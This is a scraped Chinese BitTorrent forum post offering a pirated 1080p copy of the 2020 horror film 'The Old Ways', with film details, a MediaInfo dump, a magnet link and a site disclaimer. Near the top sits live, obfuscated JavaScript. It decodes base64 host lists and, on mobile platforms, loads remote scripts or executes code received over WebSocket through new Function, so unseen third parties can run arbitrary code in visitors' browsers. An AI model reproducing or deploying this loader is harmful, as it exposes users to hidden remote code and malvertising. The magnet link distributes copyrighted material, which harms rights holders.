驱魔古法[中文字幕].The.Old.Ways.2020.NF.1080p.WEB-DL.Atmos.DDP5.1.x264 4.63GB

版主小s 28天前 266

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 驱魔古法
◎片  名 The Old Ways
◎年  代 2020
◎产  地 美国
◎类  别 恐怖
◎语  言 英语
◎上映日期 2020-10-16(Sitges International Film Festival)
◎IMDb链接 https://www.imdb.com/title/tt12829958/
◎豆瓣链接 https://movie.douban.com/subject/35228622/
◎演  员 安德莉亚·科尔特斯 Andrea Cortés (id:1407812)
       朱莉娅·维拉 Julia Vera (id:1300005)

◎标  签 恐怖 / M美国 / 惊悚 / 2020

◎简  介
  A reporter is kidnapped by a witch who wants to exorcise her.

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 170712460461737170380794007764449643534 (0x806E06217A46452FB96CB512749C4C0E)

  4. Complete name                            : [email protected].COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 4.63 GiB

  8. Duration                                 : 1 h 30 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 7 344 kb/s

  11. Encoded date                             : UTC 2021-08-26 09:19:35

  12. Writing application                      : mkvmerge v55.0.0 ('Waiting For Space') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID                                       : 1

  16. Format                                   : AVC

  17. Format/Info                              : Advanced Video Codec

  18. Format profile                           : [email protected]

  19. Format settings                          : CABAC / 4 Ref Frames

  20. Format settings, CABAC                   : Yes

  21. Format settings, Reference frames        : 4 frames

  22. Codec ID                                 : V_MPEG4/ISO/AVC

  23. Duration                                 : 1 h 30 min

  24. Bit rate mode                            : Variable

  25. Bit rate                                 : 6 575 kb/s

  26. Maximum bit rate                         : 20.0 Mb/s

  27. Width                                    : 1 920 pixels

  28. Height                                   : 1 080 pixels

  29. Display aspect ratio                     : 16:9

  30. Frame rate mode                          : Constant

  31. Frame rate                               : 24.000 FPS

  32. Color space                              : YUV

  33. Chroma subsampling                       : 4:2:0

  34. Bit depth                                : 8 bits

  35. Scan type                                : Progressive

  36. Bits/(Pixel*Frame)                       : 0.132

  37. Stream size                              : 4.15 GiB (90%)

  38. Writing library                          : x264 core 148 r2722 1b0121b

  39. Encoding settings                        : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=16.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80

  40. Default                                  : Yes

  41. Forced                                   : No


  42. Audio

  43. ID                                       : 2

  44. Format                                   : E-AC-3 JOC

  45. Format/Info                              : Enhanced AC-3 with Joint Object Coding

  46. Commercial name                          : Dolby Digital Plus with Dolby Atmos

  47. Codec ID                                 : A_EAC3

  48. Duration                                 : 1 h 30 min

  49. Bit rate mode                            : Constant

  50. Bit rate                                 : 768 kb/s

  51. Channel(s)                               : 6 channels

  52. Channel layout                           : L R C LFE Ls Rs

  53. Sampling rate                            : 48.0 kHz

  54. Frame rate                               : 31.250 FPS (1536 SPF)

  55. Compression mode                         : Lossy

  56. Stream size                              : 496 MiB (10%)

  57. Language                                 : English

  58. Service kind                             : Complete Main

  59. Default                                  : Yes

  60. Forced                                   : No

  61. Complexity index                         : 16

  62. Number of dynamic objects                : 15

  63. Bed channel count                        : 1 channel

  64. Bed channel configuration                : LFE


  65. Text #1

  66. ID                                       : 3

  67. Format                                   : UTF-8

  68. Codec ID                                 : S_TEXT/UTF8

  69. Codec ID/Info                            : UTF-8 Plain Text

  70. Duration                                 : 1 h 29 min

  71. Bit rate                                 : 19 b/s

  72. Count of elements                        : 651

  73. Stream size                              : 12.7 KiB (0%)

  74. Title                                    : 简体中文

  75. Language                                 : Chinese

  76. Default                                  : Yes

  77. Forced                                   : No


  78. Text #2

  79. ID                                       : 4

  80. Format                                   : UTF-8

  81. Codec ID                                 : S_TEXT/UTF8

  82. Codec ID/Info                            : UTF-8 Plain Text

  83. Duration                                 : 1 h 29 min

  84. Bit rate                                 : 19 b/s

  85. Count of elements                        : 650

  86. Stream size                              : 12.6 KiB (0%)

  87. Title                                    : 繁體中文

  88. Language                                 : Chinese

  89. Default                                  : No

  90. Forced                                   : No


  91. Text #3

  92. ID                                       : 5

  93. Format                                   : UTF-8

  94. Codec ID                                 : S_TEXT/UTF8

  95. Codec ID/Info                            : UTF-8 Plain Text

  96. Duration                                 : 1 h 25 min

  97. Bit rate                                 : 32 b/s

  98. Count of elements                        : 978

  99. Stream size                              : 20.4 KiB (0%)

  100. Title                                    : CC

  101. Language                                 : English

  102. Default                                  : No

  103. Forced                                   : No


  104. Text #4

  105. ID                                       : 6

  106. Format                                   : UTF-8

  107. Codec ID                                 : S_TEXT/UTF8

  108. Codec ID/Info                            : UTF-8 Plain Text

  109. Duration                                 : 1 h 22 min

  110. Bit rate                                 : 1 b/s

  111. Count of elements                        : 55

  112. Stream size                              : 1.06 KiB (0%)

  113. Title                                    : forced

  114. Language                                 : English

  115. Default                                  : No

  116. Forced                                   : No



TAGS 恐怖

磁力链:
  • magnet:?xt=urn:btih:51419DD32EEDE3E33FDC1DC7E971DFC20EF5ABC2
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖